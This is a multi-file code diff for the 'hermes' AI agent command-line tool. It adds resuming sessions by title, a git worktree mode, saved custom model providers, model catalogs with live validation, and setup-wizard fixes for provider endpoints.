session_id = db.resolve_session_by_title(name_or_id)
db.close()
return session_id
except Exception:
pass
return None
def cmd_chat(args):
"""Run interactive chat CLI."""
# Resolve --continue into --resume with the latest CLI session
if getattr(args, "continue_last", False) and not getattr(args, "resume", None):
last_id = _resolve_last_cli_session()
if last_id:
args.resume = last_id
# Resolve --continue into --resume with the latest CLI session or by name
continue_val = getattr(args, "continue_last", None)
if continue_val and not getattr(args, "resume", None):
if isinstance(continue_val, str):
# -c "session name" — resolve by title or ID
resolved = _resolve_session_by_name_or_id(continue_val)
if resolved:
args.resume = resolved
else:
print(f"No session found matching '{continue_val}'.")
print("Use 'hermes sessions list' to see available sessions.")
sys.exit(1)
else:
print("No previous CLI session found to continue.")
sys.exit(1)
# -c with no argument — continue the most recent session
last_id = _resolve_last_cli_session()
if last_id:
args.resume = last_id
else:
print("No previous CLI session found to continue.")
sys.exit(1)
# Resolve --resume by title if it's not a direct session ID
resume_val = getattr(args, "resume", None)
if resume_val:
resolved = _resolve_session_by_name_or_id(resume_val)
if resolved:
args.resume = resolved
# If resolution fails, keep the original value — _init_agent will
# report "Session not found" with the original input
# First-run guard: check if any provider is configured before launching
if not _has_any_provider_configured():
@@ -167,6 +488,7 @@ def cmd_chat(args):
"verbose": args.verbose,
"query": args.query,
"resume": getattr(args, "resume", None),
"worktree": getattr(args, "worktree", False),
}
# Filter out None values
kwargs = {k: v for k, v in kwargs.items() if v is not None}
@@ -439,9 +761,39 @@ def cmd_model(args):
("kimi-coding", "Kimi / Moonshot (Moonshot AI direct API)"),
("minimax", "MiniMax (global direct API)"),
("minimax-cn", "MiniMax China (domestic direct API)"),
("custom", "Custom endpoint (self-hosted / VLLM / etc.)"),
]
# Add user-defined custom providers from config.yaml
custom_providers_cfg = config.get("custom_providers") or []
_custom_provider_map = {} # key → {name, base_url, api_key}
if isinstance(custom_providers_cfg, list):
for entry in custom_providers_cfg:
if not isinstance(entry, dict):
continue
name = entry.get("name", "").strip()
base_url = entry.get("base_url", "").strip()
if not name or not base_url:
continue
# Generate a stable key from the name
key = "custom:" + name.lower().replace(" ", "-")
short_url = base_url.replace("https://", "").replace("http://", "").rstrip("/")
saved_model = entry.get("model", "")
model_hint = f"{saved_model}" if saved_model else ""
providers.append((key, f"{name} ({short_url}){model_hint}"))
_custom_provider_map[key] = {
"name": name,
"base_url": base_url,
"api_key": entry.get("api_key", ""),
"model": saved_model,
}
# Always add the manual custom endpoint option last
providers.append(("custom", "Custom endpoint (enter URL manually)"))
# Add removal option if there are saved custom providers
if _custom_provider_map:
providers.append(("remove-custom", "Remove a saved custom provider"))
# Reorder so the active provider is at the top
known_keys = {k for k, _ in providers}
active_key = active if active in known_keys else "custom"
@@ -469,6 +821,10 @@ def cmd_model(args):
_model_flow_openai_codex(config, current_model)
elif selected_provider == "custom":
_model_flow_custom(config)
elif selected_provider.startswith("custom:") and selected_provider in _custom_provider_map:
_model_flow_named_custom(config, _custom_provider_map[selected_provider])
elif selected_provider == "remove-custom":
_remove_custom_provider(config)
elif selected_provider in ("zai", "kimi-coding", "minimax", "minimax-cn"):
_model_flow_api_key_provider(config, selected_provider, current_model)
@@ -684,7 +1040,11 @@ def _model_flow_openai_codex(config, current_model=""):
def _model_flow_custom(config):
"""Custom endpoint: collect URL, API key, and model name."""
"""Custom endpoint: collect URL, API key, and model name.
Automatically saves the endpoint to ``custom_providers`` in config.yaml
so it appears in the provider menu on subsequent runs.
"""
from hermes_cli.auth import _save_model_choice, deactivate_provider
from hermes_cli.config import get_env_value, save_env_value, load_config, save_config
@@ -716,6 +1076,8 @@ def _model_flow_custom(config):
print(f"Invalid URL: {effective_url} (must start with http:// or https://)")
return
effective_key = api_key or current_key
if base_url:
save_env_value("OPENAI_BASE_URL", base_url)
if api_key:
@@ -728,7 +1090,7 @@ def _model_flow_custom(config):
cfg = load_config()
model = cfg.get("model")
if isinstance(model, dict):
model["provider"] = "auto"
model["provider"] = "custom"
model["base_url"] = effective_url
save_config(cfg)
deactivate_provider()
@@ -739,6 +1101,223 @@ def _model_flow_custom(config):
deactivate_provider()
print("Endpoint saved. Use `/model` in chat or `hermes model` to set a model.")
# Auto-save to custom_providers so it appears in the menu next time
_save_custom_provider(effective_url, effective_key, model_name or "")
def _save_custom_provider(base_url, api_key="", model=""):
"""Save a custom endpoint to custom_providers in config.yaml.
Deduplicates by base_url — if the URL already exists, updates the
model name but doesn't add a duplicate entry.
Auto-generates a display name from the URL hostname.
"""
from hermes_cli.config import load_config, save_config
cfg = load_config()
providers = cfg.get("custom_providers") or []
if not isinstance(providers, list):
providers = []
# Check if this URL is already saved — update model if so
for entry in providers:
if isinstance(entry, dict) and entry.get("base_url", "").rstrip("/") == base_url.rstrip("/"):
if model and entry.get("model") != model:
entry["model"] = model
cfg["custom_providers"] = providers
save_config(cfg)
return # already saved, updated model if needed
# Auto-generate a name from the URL
import re
clean = base_url.replace("https://", "").replace("http://", "").rstrip("/")
# Remove /v1 suffix for cleaner names
clean = re.sub(r"/v1/?$", "", clean)
# Use hostname:port as the name
name = clean.split("/")[0]
# Capitalize for readability
if "localhost" in name or "127.0.0.1" in name:
name = f"Local ({name})"
elif "runpod" in name.lower():
name = f"RunPod ({name})"
else:
name = name.capitalize()
entry = {"name": name, "base_url": base_url}
if api_key:
entry["api_key"] = api_key
if model:
entry["model"] = model
providers.append(entry)
cfg["custom_providers"] = providers
save_config(cfg)
print(f" 💾 Saved to custom providers as \"{name}\" (edit in config.yaml)")
def _remove_custom_provider(config):
"""Let the user remove a saved custom provider from config.yaml."""
from hermes_cli.config import load_config, save_config
cfg = load_config()
providers = cfg.get("custom_providers") or []
if not isinstance(providers, list) or not providers:
print("No custom providers configured.")
return
print("Remove a custom provider:\n")
choices = []
for entry in providers:
if isinstance(entry, dict):
name = entry.get("name", "unnamed")
url = entry.get("base_url", "")
short_url = url.replace("https://", "").replace("http://", "").rstrip("/")
choices.append(f"{name} ({short_url})")
else:
choices.append(str(entry))
choices.append("Cancel")
try:
from simple_term_menu import TerminalMenu
menu = TerminalMenu(
[f" {c}" for c in choices], cursor_index=0,
menu_cursor="-> ", menu_cursor_style=("fg_red", "bold"),
menu_highlight_style=("fg_red",),
cycle_cursor=True, clear_screen=False,
title="Select provider to remove:",
)
idx = menu.show()
print()
except (ImportError, NotImplementedError):
for i, c in enumerate(choices, 1):
print(f" {i}. {c}")
print()
try:
val = input(f"Choice [1-{len(choices)}]: ").strip()
idx = int(val) - 1 if val else None
except (ValueError, KeyboardInterrupt, EOFError):
idx = None
if idx is None or idx >= len(providers):
print("No change.")
return
removed = providers.pop(idx)
cfg["custom_providers"] = providers
save_config(cfg)
removed_name = removed.get("name", "unnamed") if isinstance(removed, dict) else str(removed)
print(f"✅ Removed \"{removed_name}\" from custom providers.")
def _model_flow_named_custom(config, provider_info):
"""Handle a named custom provider from config.yaml custom_providers list.
If the entry has a saved model name, activates it immediately.
Otherwise probes the endpoint's /models API to let the user pick one.
"""
from hermes_cli.auth import _save_model_choice, deactivate_provider
from hermes_cli.config import save_env_value, load_config, save_config
from hermes_cli.models import fetch_api_models
name = provider_info["name"]
base_url = provider_info["base_url"]
api_key = provider_info.get("api_key", "")
saved_model = provider_info.get("model", "")
# If a model is saved, just activate immediately — no probing needed
if saved_model:
save_env_value("OPENAI_BASE_URL", base_url)
if api_key:
save_env_value("OPENAI_API_KEY", api_key)
_save_model_choice(saved_model)
cfg = load_config()
model = cfg.get("model")
if isinstance(model, dict):
model["provider"] = "custom"
model["base_url"] = base_url
save_config(cfg)
deactivate_provider()
print(f"✅ Switched to: {saved_model}")
print(f" Provider: {name} ({base_url})")
return
# No saved model — probe endpoint and let user pick
print(f" Provider: {name}")
print(f" URL: {base_url}")
print()
print("No model saved for this provider. Fetching available models...")
models = fetch_api_models(api_key, base_url, timeout=8.0)
if models:
print(f"Found {len(models)} model(s):\n")
try:
from simple_term_menu import TerminalMenu
menu_items = [f" {m}" for m in models] + [" Cancel"]
menu = TerminalMenu(
menu_items, cursor_index=0,
menu_cursor="-> ", menu_cursor_style=("fg_green", "bold"),
menu_highlight_style=("fg_green",),
cycle_cursor=True, clear_screen=False,
title=f"Select model from {name}:",
)
idx = menu.show()
print()
if idx is None or idx >= len(models):
print("Cancelled.")
return
model_name = models[idx]
except (ImportError, NotImplementedError):
for i, m in enumerate(models, 1):
print(f" {i}. {m}")
print(f" {len(models) + 1}. Cancel")
print()
try:
val = input(f"Choice [1-{len(models) + 1}]: ").strip()
if not val:
print("Cancelled.")
return
idx = int(val) - 1
if idx < 0 or idx >= len(models):
print("Cancelled.")
return
model_name = models[idx]
except (ValueError, KeyboardInterrupt, EOFError):
print("\nCancelled.")
return
else:
print("Could not fetch models from endpoint. Enter model name manually.")
try:
model_name = input("Model name: ").strip()
except (KeyboardInterrupt, EOFError):
print("\nCancelled.")
return
if not model_name:
print("No model specified. Cancelled.")
return
# Activate and save the model to the custom_providers entry
save_env_value("OPENAI_BASE_URL", base_url)
if api_key:
save_env_value("OPENAI_API_KEY", api_key)
_save_model_choice(model_name)
cfg = load_config()
model = cfg.get("model")
if isinstance(model, dict):
model["provider"] = "custom"
model["base_url"] = base_url
save_config(cfg)
deactivate_provider()
# Save model name to the custom_providers entry for next time
_save_custom_provider(base_url, api_key, model_name)
print(f"\n✅ Model set to: {model_name}")
print(f" Provider: {name} ({base_url})")
# Curated model lists for direct API-key providers
_PROVIDER_MODELS = {
@@ -1208,8 +1787,9 @@ def main():
Examples:
hermes Start interactive chat
hermes chat -q "Hello" Single query mode
hermes --continue Resume the most recent session
hermes --resume <session_id> Resume a specific session
hermes -c Resume the most recent session
hermes -c "my project" Resume a session by name (latest in lineage)
hermes --resume <session_id> Resume a specific session by ID
hermes setup Run setup wizard
hermes logout Clear stored authentication
hermes model Select default model
@@ -1217,8 +1797,11 @@ Examples:
hermes config edit Edit config in $EDITOR
hermes config set model gpt-4 Set a config value
hermes gateway Run messaging gateway
hermes -w Start in isolated git worktree
hermes gateway install Install as system service
hermes sessions list List past sessions
hermes sessions browse Interactive session picker
hermes sessions rename ID T Rename/title a session
hermes update Update to latest version
For more help on a command:
@@ -1233,16 +1816,24 @@ For more help on a command:
)
parser.add_argument(
"--resume", "-r",
metavar="SESSION_ID",
metavar="SESSION",
default=None,
help="Resume a previous session by ID (shortcut for: hermes chat --resume ID)"
help="Resume a previous session by ID or title"
)
parser.add_argument(
"--continue", "-c",
dest="continue_last",
nargs="?",
const=True,
default=None,
metavar="SESSION_NAME",
help="Resume a session by name, or the most recent if no name given"
)
parser.add_argument(
"--worktree", "-w",
action="store_true",
default=False,
help="Resume the most recent CLI session"
help="Run in an isolated git worktree (for parallel agents)"
)
subparsers = parser.add_subparsers(dest="command", help="Command to run")
@@ -1286,9 +1877,17 @@ For more help on a command:
chat_parser.add_argument(
"--continue", "-c",
dest="continue_last",
nargs="?",
const=True,
default=None,
metavar="SESSION_NAME",
help="Resume a session by name, or the most recent if no name given"
)
chat_parser.add_argument(
"--worktree", "-w",
action="store_true",
default=False,
help="Resume the most recent CLI session"
help="Run in an isolated git worktree (for parallel agents on the same repo)"
)
chat_parser.set_defaults(func=cmd_chat)
@@ -1315,6 +1914,8 @@ For more help on a command:
# gateway run (default)
gateway_run = gateway_subparsers.add_parser("run", help="Run gateway in foreground")
gateway_run.add_argument("-v", "--verbose", action="store_true")
gateway_run.add_argument("--replace", action="store_true",
help="Replace any existing gateway instance (useful for systemd)")
# gateway start
gateway_start = gateway_subparsers.add_parser("start", help="Start gateway service")
@@ -1655,7 +2256,7 @@ For more help on a command:
# =========================================================================
sessions_parser = subparsers.add_parser(
"sessions",
help="Manage session history (list, export, prune, delete)",
help="Manage session history (list, rename, export, prune, delete)",
description="View and manage the SQLite session store"
)
sessions_subparsers = sessions_parser.add_subparsers(dest="sessions_action")
@@ -1680,6 +2281,17 @@ For more help on a command:
sessions_stats = sessions_subparsers.add_parser("stats", help="Show session store statistics")
sessions_rename = sessions_subparsers.add_parser("rename", help="Set or change a session's title")
sessions_rename.add_argument("session_id", help="Session ID to rename")
sessions_rename.add_argument("title", nargs="+", help="New title for the session")
sessions_browse = sessions_subparsers.add_parser(
"browse",
help="Interactive session picker — browse, search, and resume sessions",
)
sessions_browse.add_argument("--source", help="Filter by source (cli, telegram, discord, etc.)")
sessions_browse.add_argument("--limit", type=int, default=50, help="Max sessions to load (default: 50)")
def cmd_sessions(args):
import json as _json
try:
@@ -1692,18 +2304,51 @@ For more help on a command:
action = args.sessions_action
if action == "list":
sessions = db.search_sessions(source=args.source, limit=args.limit)
sessions = db.list_sessions_rich(source=args.source, limit=args.limit)
if not sessions:
print("No sessions found.")
return
print(f"{'ID':<30} {'Source':<12} {'Model':<30} {'Messages':>8} {'Started'}")
print("" * 100)
from datetime import datetime
import time as _time
def _relative_time(ts):
"""Format a timestamp as relative time (e.g., '2h ago', 'yesterday')."""
if not ts:
return "?"
delta = _time.time() - ts
if delta < 60:
return "just now"
elif delta < 3600:
mins = int(delta / 60)
return f"{mins}m ago"
elif delta < 86400:
hours = int(delta / 3600)
return f"{hours}h ago"
elif delta < 172800:
return "yesterday"
elif delta < 604800:
days = int(delta / 86400)
return f"{days}d ago"
else:
return datetime.fromtimestamp(ts).strftime("%Y-%m-%d")
has_titles = any(s.get("title") for s in sessions)
if has_titles:
print(f"{'Title':<22} {'Preview':<40} {'Last Active':<13} {'ID'}")
print("" * 100)
else:
print(f"{'Preview':<50} {'Last Active':<13} {'Src':<6} {'ID'}")
print("" * 90)
for s in sessions:
started = datetime.fromtimestamp(s["started_at"]).strftime("%Y-%m-%d %H:%M") if s["started_at"] else "?"
model = (s.get("model") or "?")[:28]
ended = " (ended)" if s.get("ended_at") else ""
print(f"{s['id']:<30} {s['source']:<12} {model:<30} {s['message_count']:>8} {started}{ended}")
last_active = _relative_time(s.get("last_active"))
preview = s.get("preview", "")[:38] if has_titles else s.get("preview", "")[:48]
if has_titles:
title = (s.get("title") or "")[:20]
sid = s["id"][:20]
print(f"{title:<22} {preview:<40} {last_active:<13} {sid}")
else:
sid = s["id"][:20]
print(f"{preview:<50} {last_active:<13} {s['source']:<6} {sid}")
elif action == "export":
if args.session_id:
@@ -1743,6 +2388,44 @@ For more help on a command:
count = db.prune_sessions(older_than_days=days, source=args.source)
print(f"Pruned {count} session(s).")
elif action == "rename":
title = " ".join(args.title)
try:
if db.set_session_title(args.session_id, title):
print(f"Session '{args.session_id}' renamed to: {title}")
else:
print(f"Session '{args.session_id}' not found.")
except ValueError as e:
print(f"Error: {e}")
elif action == "browse":
limit = getattr(args, "limit", 50) or 50
source = getattr(args, "source", None)
sessions = db.list_sessions_rich(source=source, limit=limit)
db.close()
if not sessions:
print("No sessions found.")
return
selected_id = _session_browse_picker(sessions)
if not selected_id:
print("Cancelled.")
return
# Launch hermes --resume <id> by replacing the current process
print(f"Resuming session: {selected_id}")
import shutil
hermes_bin = shutil.which("hermes")
if hermes_bin:
os.execvp(hermes_bin, ["hermes", "--resume", selected_id])
else:
# Fallback: re-invoke via python -m
os.execvp(
sys.executable,
[sys.executable, "-m", "hermes_cli.main", "--resume", selected_id],
)
return # won't reach here after execvp
elif action == "stats":
total = db.session_count()
msgs = db.message_count()
@@ -1752,7 +2435,6 @@ For more help on a command:
c = db.session_count(source=src)
if c > 0:
print(f" {src}: {c} sessions")
import os
db_path = db.db_path
if db_path.exists():
size_mb = os.path.getsize(db_path) / (1024 * 1024)
@@ -1848,6 +2530,8 @@ For more help on a command:
args.provider = None
args.toolsets = None
args.verbose = False
if not hasattr(args, "worktree"):
args.worktree = False
cmd_chat(args)
return
@@ -1859,7 +2543,9 @@ For more help on a command:
args.toolsets = None
args.verbose = False
args.resume = None
args.continue_last = False
args.continue_last = None
if not hasattr(args, "worktree"):
args.worktree = False
cmd_chat(args)
return

View File

@@ -1,10 +1,18 @@
"""
Canonical list of OpenRouter models offered in CLI and setup wizards.
Canonical model catalogs and lightweight validation helpers.
Add, remove, or reorder entries here — both `hermes setup` and
`hermes` provider-selection will pick up the change automatically.
"""
from __future__ import annotations
import json
import urllib.request
import urllib.error
from difflib import get_close_matches
from typing import Any, Optional
# (model_id, display description shown in menus)
OPENROUTER_MODELS: list[tuple[str, str]] = [
("anthropic/claude-opus-4.6", "recommended"),
@@ -14,17 +22,64 @@ OPENROUTER_MODELS: list[tuple[str, str]] = [
("openai/gpt-5.3-codex", ""),
("google/gemini-3-pro-preview", ""),
("google/gemini-3-flash-preview", ""),
("qwen/qwen3.5-plus-02-15", ""),
("qwen/qwen3.5-35b-a3b", ""),
("qwen/qwen3.5-plus-02-15", ""),
("qwen/qwen3.5-35b-a3b", ""),
("stepfun/step-3.5-flash", ""),
("z-ai/glm-5", ""),
("moonshotai/kimi-k2.5", ""),
("minimax/minimax-m2.5", ""),
]
_PROVIDER_MODELS: dict[str, list[str]] = {
"zai": [
"glm-5",
"glm-4.7",
"glm-4.5",
"glm-4.5-flash",
],
"kimi-coding": [
"kimi-k2.5",
"kimi-k2-thinking",
"kimi-k2-turbo-preview",
"kimi-k2-0905-preview",
],
"minimax": [
"MiniMax-M2.5",
"MiniMax-M2.5-highspeed",
"MiniMax-M2.1",
],
"minimax-cn": [
"MiniMax-M2.5",
"MiniMax-M2.5-highspeed",
"MiniMax-M2.1",
],
}
_PROVIDER_LABELS = {
"openrouter": "OpenRouter",
"openai-codex": "OpenAI Codex",
"nous": "Nous Portal",
"zai": "Z.AI / GLM",
"kimi-coding": "Kimi / Moonshot",
"minimax": "MiniMax",
"minimax-cn": "MiniMax (China)",
"custom": "Custom endpoint",
}
_PROVIDER_ALIASES = {
"glm": "zai",
"z-ai": "zai",
"z.ai": "zai",
"zhipu": "zai",
"kimi": "kimi-coding",
"moonshot": "kimi-coding",
"minimax-china": "minimax-cn",
"minimax_cn": "minimax-cn",
}
def model_ids() -> list[str]:
"""Return just the model-id strings (convenience helper)."""
"""Return just the OpenRouter model-id strings."""
return [mid for mid, _ in OPENROUTER_MODELS]
@@ -34,3 +89,231 @@ def menu_labels() -> list[str]:
for mid, desc in OPENROUTER_MODELS:
labels.append(f"{mid} ({desc})" if desc else mid)
return labels
# All provider IDs and aliases that are valid for the provider:model syntax.
_KNOWN_PROVIDER_NAMES: set[str] = (
set(_PROVIDER_LABELS.keys())
| set(_PROVIDER_ALIASES.keys())
| {"openrouter", "custom"}
)
def list_available_providers() -> list[dict[str, str]]:
"""Return info about all providers the user could use with ``provider:model``.
Each dict has ``id``, ``label``, and ``aliases``.
Checks which providers have valid credentials configured.
"""
# Canonical providers in display order
_PROVIDER_ORDER = [
"openrouter", "nous", "openai-codex",
"zai", "kimi-coding", "minimax", "minimax-cn",
]
# Build reverse alias map
aliases_for: dict[str, list[str]] = {}
for alias, canonical in _PROVIDER_ALIASES.items():
aliases_for.setdefault(canonical, []).append(alias)
result = []
for pid in _PROVIDER_ORDER:
label = _PROVIDER_LABELS.get(pid, pid)
alias_list = aliases_for.get(pid, [])
# Check if this provider has credentials available
has_creds = False
try:
from hermes_cli.runtime_provider import resolve_runtime_provider
runtime = resolve_runtime_provider(requested=pid)
has_creds = bool(runtime.get("api_key"))
except Exception:
pass
result.append({
"id": pid,
"label": label,
"aliases": alias_list,
"authenticated": has_creds,
})
return result
def parse_model_input(raw: str, current_provider: str) -> tuple[str, str]:
"""Parse ``/model`` input into ``(provider, model)``.
Supports ``provider:model`` syntax to switch providers at runtime::
openrouter:anthropic/claude-sonnet-4.5 → ("openrouter", "anthropic/claude-sonnet-4.5")
nous:hermes-3 → ("nous", "hermes-3")
anthropic/claude-sonnet-4.5 → (current_provider, "anthropic/claude-sonnet-4.5")
gpt-5.4 → (current_provider, "gpt-5.4")
The colon is only treated as a provider delimiter if the left side is a
recognized provider name or alias. This avoids misinterpreting model names
that happen to contain colons (e.g. ``anthropic/claude-3.5-sonnet:beta``).
Returns ``(provider, model)`` where *provider* is either the explicit
provider from the input or *current_provider* if none was specified.
"""
stripped = raw.strip()
colon = stripped.find(":")
if colon > 0:
provider_part = stripped[:colon].strip().lower()
model_part = stripped[colon + 1:].strip()
if provider_part and model_part and provider_part in _KNOWN_PROVIDER_NAMES:
return (normalize_provider(provider_part), model_part)
return (current_provider, stripped)
def curated_models_for_provider(provider: Optional[str]) -> list[tuple[str, str]]:
"""Return ``(model_id, description)`` tuples for a provider's curated list."""
normalized = normalize_provider(provider)
if normalized == "openrouter":
return list(OPENROUTER_MODELS)
models = _PROVIDER_MODELS.get(normalized, [])
return [(m, "") for m in models]
def normalize_provider(provider: Optional[str]) -> str:
"""Normalize provider aliases to Hermes' canonical provider ids.
Note: ``"auto"`` passes through unchanged — use
``hermes_cli.auth.resolve_provider()`` to resolve it to a concrete
provider based on credentials and environment.
"""
normalized = (provider or "openrouter").strip().lower()
return _PROVIDER_ALIASES.get(normalized, normalized)
def provider_model_ids(provider: Optional[str]) -> list[str]:
"""Return the best known model catalog for a provider."""
normalized = normalize_provider(provider)
if normalized == "openrouter":
return model_ids()
if normalized == "openai-codex":
from hermes_cli.codex_models import get_codex_model_ids
return get_codex_model_ids()
return list(_PROVIDER_MODELS.get(normalized, []))
def fetch_api_models(
api_key: Optional[str],
base_url: Optional[str],
timeout: float = 5.0,
) -> Optional[list[str]]:
"""Fetch the list of available model IDs from the provider's ``/models`` endpoint.
Returns a list of model ID strings, or ``None`` if the endpoint could not
be reached (network error, timeout, auth failure, etc.).
"""
if not base_url:
return None
url = base_url.rstrip("/") + "/models"
headers: dict[str, str] = {}
if api_key:
headers["Authorization"] = f"Bearer {api_key}"
req = urllib.request.Request(url, headers=headers)
try:
with urllib.request.urlopen(req, timeout=timeout) as resp:
data = json.loads(resp.read().decode())
# Standard OpenAI format: {"data": [{"id": "model-name", ...}, ...]}
return [m.get("id", "") for m in data.get("data", [])]
except Exception:
return None
def validate_requested_model(
model_name: str,
provider: Optional[str],
*,
api_key: Optional[str] = None,
base_url: Optional[str] = None,
) -> dict[str, Any]:
"""
Validate a ``/model`` value for the active provider.
Performs format checks first, then probes the live API to confirm
the model actually exists.
Returns a dict with:
- accepted: whether the CLI should switch to the requested model now
- persist: whether it is safe to save to config
- recognized: whether it matched a known provider catalog
- message: optional warning / guidance for the user
"""
requested = (model_name or "").strip()
normalized = normalize_provider(provider)
if normalized == "openrouter" and base_url and "openrouter.ai" not in base_url:
normalized = "custom"
if not requested:
return {
"accepted": False,
"persist": False,
"recognized": False,
"message": "Model name cannot be empty.",
}
if any(ch.isspace() for ch in requested):
return {
"accepted": False,
"persist": False,
"recognized": False,
"message": "Model names cannot contain spaces.",
}
# Probe the live API to check if the model actually exists
api_models = fetch_api_models(api_key, base_url)
if api_models is not None:
if requested in set(api_models):
# API confirmed the model exists
return {
"accepted": True,
"persist": True,
"recognized": True,
"message": None,
}
else:
# API responded but model is not listed
suggestions = get_close_matches(requested, api_models, n=3, cutoff=0.5)
suggestion_text = ""
if suggestions:
suggestion_text = "\n Did you mean: " + ", ".join(f"`{s}`" for s in suggestions)
return {
"accepted": False,
"persist": False,
"recognized": False,
"message": (
f"Error: `{requested}` is not a valid model for this provider."
f"{suggestion_text}"
),
}
# api_models is None — couldn't reach API, fall back to catalog check
provider_label = _PROVIDER_LABELS.get(normalized, normalized)
known_models = provider_model_ids(normalized)
if requested in known_models:
return {
"accepted": True,
"persist": True,
"recognized": True,
"message": None,
}
# Can't validate — accept for session only
suggestion = get_close_matches(requested, known_models, n=1, cutoff=0.6)
suggestion_text = f" Did you mean `{suggestion[0]}`?" if suggestion else ""
return {
"accepted": True,
"persist": False,
"recognized": False,
"message": (
f"Could not validate `{requested}` against the live {provider_label} API. "
"Using it for this session only; config unchanged."
f"{suggestion_text}"
),
}

View File

@@ -632,6 +632,29 @@ def setup_model_provider(config: dict):
save_env_value("OPENAI_BASE_URL", "")
save_env_value("OPENAI_API_KEY", "")
# Update config.yaml and deactivate any OAuth provider so the
# resolver doesn't keep returning the old provider (e.g. Codex).
try:
from hermes_cli.auth import deactivate_provider
deactivate_provider()
except Exception:
pass
import yaml
config_path = Path(os.environ.get("HERMES_HOME", Path.home() / ".hermes")) / "config.yaml"
try:
disk_cfg = {}
if config_path.exists():
disk_cfg = yaml.safe_load(config_path.read_text()) or {}
model_section = disk_cfg.get("model", {})
if isinstance(model_section, str):
model_section = {"default": model_section}
model_section["provider"] = "openrouter"
model_section.pop("base_url", None) # OpenRouter uses default URL
disk_cfg["model"] = model_section
config_path.write_text(yaml.safe_dump(disk_cfg, sort_keys=False))
except Exception as e:
logger.debug("Could not save provider to config.yaml: %s", e)
elif provider_idx == 3: # Custom endpoint
selected_provider = "custom"
print()
@@ -659,6 +682,28 @@ def setup_model_provider(config: dict):
if model_name:
config['model'] = model_name
save_env_value("LLM_MODEL", model_name)
# Save provider and base_url to config.yaml so the gateway and CLI
# both resolve the correct provider without relying on env-var heuristics.
if base_url:
import yaml
config_path = Path(os.environ.get("HERMES_HOME", Path.home() / ".hermes")) / "config.yaml"
try:
disk_cfg = {}
if config_path.exists():
disk_cfg = yaml.safe_load(config_path.read_text()) or {}
model_section = disk_cfg.get("model", {})
if isinstance(model_section, str):
model_section = {"default": model_section}
model_section["provider"] = "custom"
model_section["base_url"] = base_url.rstrip("/")
if model_name:
model_section["default"] = model_name
disk_cfg["model"] = model_section
config_path.write_text(yaml.safe_dump(disk_cfg, sort_keys=False))
except Exception as e:
logger.debug("Could not save provider to config.yaml: %s", e)
print_success("Custom endpoint configured")
elif provider_idx == 4: # Z.AI / GLM
@@ -667,16 +712,17 @@ def setup_model_provider(config: dict):
print_header("Z.AI / GLM API Key")
pconfig = PROVIDER_REGISTRY["zai"]
print_info(f"Provider: {pconfig.name}")
print_info(f"Base URL: {pconfig.inference_base_url}")
print_info("Get your API key at: https://open.bigmodel.cn/")
print()
existing_key = get_env_value("GLM_API_KEY") or get_env_value("ZAI_API_KEY")
api_key = existing_key # will be overwritten if user enters a new one
if existing_key:
print_info(f"Current: {existing_key[:8]}... (configured)")
if prompt_yes_no("Update API key?", False):
api_key = prompt(" GLM API key", password=True)
if api_key:
new_key = prompt(" GLM API key", password=True)
if new_key:
api_key = new_key
save_env_value("GLM_API_KEY", api_key)
print_success("GLM API key updated")
else:
@@ -687,11 +733,32 @@ def setup_model_provider(config: dict):
else:
print_warning("Skipped - agent won't work without an API key")
# Detect the correct z.ai endpoint for this key.
# Z.AI has separate billing for general vs coding plans and
# global vs China endpoints — we probe to find the right one.
zai_base_url = pconfig.inference_base_url
if api_key:
print()
print_info("Detecting your z.ai endpoint...")
from hermes_cli.auth import detect_zai_endpoint
detected = detect_zai_endpoint(api_key)
if detected:
zai_base_url = detected["base_url"]
print_success(f"Detected: {detected['label']} endpoint")
print_info(f" URL: {detected['base_url']}")
if detected["id"].startswith("coding"):
print_info(f" Note: Coding Plan detected — GLM-5 is not available, using {detected['model']}")
save_env_value("GLM_BASE_URL", zai_base_url)
else:
print_warning("Could not verify any z.ai endpoint with this key.")
print_info(f" Using default: {zai_base_url}")
print_info(" If you get billing errors, check your plan at https://open.bigmodel.cn/")
# Clear custom endpoint vars if switching
if existing_custom:
save_env_value("OPENAI_BASE_URL", "")
save_env_value("OPENAI_API_KEY", "")
_update_config_for_provider("zai", pconfig.inference_base_url)
_update_config_for_provider("zai", zai_base_url)
elif provider_idx == 5: # Kimi / Moonshot
selected_provider = "kimi-coding"
@@ -838,9 +905,18 @@ def setup_model_provider(config: dict):
config['model'] = model_name
# else: keep current
elif selected_provider == "nous":
# Nous login succeeded but model fetch failed — prompt manually
# instead of falling through to the OpenRouter static list.
print_warning("Could not fetch available models from Nous Portal.")
print_info("Enter a Nous model name manually (e.g., claude-opus-4-6).")
custom = prompt(f" Model name (Enter to keep '{current_model}')")
if custom:
config['model'] = custom
save_env_value("LLM_MODEL", custom)
elif selected_provider == "openai-codex":
from hermes_cli.codex_models import get_codex_models
codex_models = get_codex_models()
from hermes_cli.codex_models import get_codex_model_ids
codex_models = get_codex_model_ids()
model_choices = codex_models + [f"Keep current ({current_model})"]
default_codex = 0
if current_model in codex_models:
@@ -859,7 +935,12 @@ def setup_model_provider(config: dict):
save_env_value("LLM_MODEL", custom)
_update_config_for_provider("openai-codex", DEFAULT_CODEX_BASE_URL)
elif selected_provider == "zai":
zai_models = ["glm-5", "glm-4.7", "glm-4.5", "glm-4.5-flash"]
# Coding Plan endpoints don't have GLM-5
is_coding_plan = get_env_value("GLM_BASE_URL") and "coding" in (get_env_value("GLM_BASE_URL") or "")
if is_coding_plan:
zai_models = ["glm-4.7", "glm-4.5", "glm-4.5-flash"]
else:
zai_models = ["glm-5", "glm-4.7", "glm-4.5", "glm-4.5-flash"]
model_choices = list(zai_models)
model_choices.append("Custom model")
model_choices.append(f"Keep current ({current_model})")
@@ -1228,7 +1309,7 @@ def setup_agent_settings(config: dict):
# ── Max Iterations ──
print_header("Agent Settings")
current_max = get_env_value('HERMES_MAX_ITERATIONS') or '60'
current_max = get_env_value('HERMES_MAX_ITERATIONS') or '90'
print_info("Maximum tool-calling iterations per conversation.")
print_info("Higher = more complex tasks, but costs more tokens.")
print_info("Recommended: 30-60 for most tasks, 100+ for open exploration.")
@@ -1624,14 +1705,18 @@ def setup_gateway(config: dict):
# Section 5: Tool Configuration (delegates to unified tools_config.py)
# =============================================================================
def setup_tools(config: dict):
def setup_tools(config: dict, first_install: bool = False):
"""Configure tools — delegates to the unified tools_command() in tools_config.py.
Both `hermes setup tools` and `hermes tools` use the same flow:
platform selection → toolset toggles → provider/API key configuration.
Args:
first_install: When True, uses the simplified first-install flow
(no platform menu, prompts for all unconfigured API keys).
"""
from hermes_cli.tools_config import tools_command
tools_command()
tools_command(first_install=first_install, config=config)
# =============================================================================
